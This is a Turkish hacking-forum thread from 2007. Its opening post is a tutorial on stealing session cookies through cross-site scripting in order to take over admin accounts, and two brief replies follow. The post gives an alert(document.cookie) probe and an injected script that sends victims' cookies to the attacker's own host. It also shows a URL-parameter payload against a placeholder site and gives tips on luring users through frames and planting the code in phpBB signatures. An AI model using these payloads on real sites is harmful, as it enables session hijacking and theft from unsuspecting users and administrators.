PortalliPortalli  ForumForum  AnasayfaAnasayfa  TakvimTakvim  SSSSSS  AramaArama  Kayıt OlKayıt Ol  Üye ListesiÜye Listesi  Kullanıcı GruplarıKullanıcı Grupları  YöneticilerYöneticiler  Giriş yap  

Paylaş | 
 

 XSS ve Cookie Yöntemiyle Hack

Aşağa gitmek 
YazarMesaj
Hacker Namzeti
HTT Üyesi
HTT Üyesi
avatar

Erkek
Mesaj Sayısı : 334
Şehir : www.hackturkiye.ile.biz
Meslek : Hack|Hack
Kayıt tarihi : 30/07/07

MesajKonu: XSS ve Cookie Yöntemiyle Hack   Ptsi Tem. 30, 2007 7:52 pm

Öncelikle Cookie nedir ne işe yarar kısa bir açıklama ile konuya girmek istiyorum. Cookie nette gezinirken kullandığınız web sitelerinin sizi tanımasını sağlayan .txt uzantılı web kimliğinizdir. Bir çok mail girişinde veyahut forum girişlerinde "Beni Hatırla" seçeneğini görmüşsünüzdür mutlaka. Bu gibi işlemler kullandığınız tarayıcılar ("IE, Mozilla" gibi) bilgisayarınıza kaydederek aynı siteye birdahaki girişlerinize sizi otomatik olarak tanımanıza yardımcı olur. Bu dosyalar aynı zamanda bir forumda user mı yoksa admin olduğumuzu da tanımlayan dosyalardır.

Cookie çalmakla elde etmek istediğimiz amaç kendi user kimliğimizi hacklemek istediğimiz admin kimliğine dönüştürmektir diyebiliriz.

COOKIE’Yi Nasıl Çalarız..
Cookie çalma olayı için öncelikle hacklemek istediğimiz web sitesi üzerindeki açıkları taramamız gerekir. Buna örnek olarak site içerisinde html/java/swf gibi açıkları kullanabileceğimiz yerler olmakla birlikte İmza altına atılan, ya da avatar bölümünden kullanabileceğimiz bir kod da olabilir.

En basitinden <script>javascript:alert(document·cookie);</script> java dilinde yazılan uyarı kodu ile cookie parametresini birleştirirsek o anki cookinizi ekrana yansıtır. Tabi bu olay sizin ne kadar tecrübeli olduğunuza ya da web dilleri bilginize bağlıdır.


Örnek:

Basit yazılmış bir script ile cookie’nin loglanmasını sağlayabiliriz. Açığın olduğu yere birazdan vereceğim kodu enjekte ederek scripti istemeden çalıştıran birinin cookie bilgilerini alabiliriz. Bunu direk link vererekte yapabilirsiniz yalnız karşınızdaki biraz kurnaz ise herhangi bir yolla bu kodu yutturmanızgerekiyor. Yani bu sizin hayal gücünüze kalmış. Özellikle bunu çoğu forumda ya da kişiselweb sitelerinde frame içinde yutturmanızda mümkün.

KOD:

<php>

Yukarıda php diliyle yazılmış bir script görüyorsunuz. Bu script cookie’yi loglamaya yarayacak.Bu kodu öncelikle farklı kaydet deyip .php uzantılı olarak kaydediyoruz. Kendinize ait bir hosta atıyorsunuz.

Açıklamalar:

loglarburaya.txt: Yeni bir .txt belgesi oluşturarak logları buraya yazın. Cookie’nin yazılabilmesi için mutlaka CHMOD’unun 777 yani yazma izinli olması gerekiyor.

Cookie’yi çalma kodu:

KOD:

<script>window.navigate("http://siteniz.com/cookie.php?cookie="+document·cookie)</script>

Şimdi hacklemek istediğimiz sitedeki açıkları denemeye geliyoruz.
Örneğin elimizde www.xxx.com/oyun.asp?id

Biz bunu önceki verdiğim örnek kodla deniyoruz;
www.xxx.com/oyun.asp?id=<script>javascript:alert(documen t.cookie);</script>

Öncelikle bakmamız gereken sitede <; gibi taglar yasaklanmış mı. Şayet yasaklanmamış ise işimize koyuluyoruz. Eğer fazla oyalanırsanız zaman aşımından script etkisiz hale gelebilir o yüzden elinizi çabuk tutmakta yarar var.

Baktık açığımız var. Burdan bir şekilde frame ile kullancıyı buraya sokturmamız gerekiyor. Yani Xss açığı olan yere.

http://www.xxx.com/oyun.asp?id=<script>window.navigate("http://siteniz.com/cookie.php?cookie="+document·cookie)</script>

Kullanıcı ya da admin bu adrese girdiğinde cookileri size gelecektir. Bu yöntemi forumlarda kullanabilirsiniz. Phpbb 2.0.16 Xss açığı ile imzaya eklediğiniz kod ile konunuza bakan tm kullanıcların cookieleri siz gelecektir. XSS geleceğin en tehlikeli açıklarından bunu söylemek yanlış olmaz çünkü bu açık sayesinde kafanıza kullanarak mail, wap serverlerına girmeniz bile mümkün gerisi sizin hayal gücünüze kalmış..

_________________


Ne Bizi Sevecek Bir Kız Bulabildik;
Ne De Onların Sevebilecekleri Kadar Basit Olabildik.

BENİM DUYGULARIM YOĞUN BE GÜZELİM!!!
Sayfa başına dön Aşağa gitmek
Kullanıcı profilini gör http://hackturkiye.buygoo.net/
ByDooM®-siktiler beni-
Siktir Çekilmiş Üye
Siktir Çekilmiş Üye
avatar

Mesaj Sayısı : 44
Kayıt tarihi : 30/07/07

MesajKonu: Geri: XSS ve Cookie Yöntemiyle Hack   Salı Tem. 31, 2007 3:16 pm

guzel paylasım elıne saglık
Sayfa başına dön Aşağa gitmek
Kullanıcı profilini gör
DamaR
HTT Üyesi
HTT Üyesi
avatar

Mesaj Sayısı : 87
Kayıt tarihi : 03/08/07

MesajKonu: Geri: XSS ve Cookie Yöntemiyle Hack   Cuma Ağus. 03, 2007 11:26 am

cok uzun paylasımlar yapıyosun okuyamıyorum Wink
Sayfa başına dön Aşağa gitmek
Kullanıcı profilini gör
 
XSS ve Cookie Yöntemiyle Hack
Sayfa başına dön 
1 sayfadaki 1 sayfası

Bu forumun müsaadesi var:Bu forumdaki mesajlara cevap veremezsiniz
 ::  :: WEB Security-
Buraya geçin: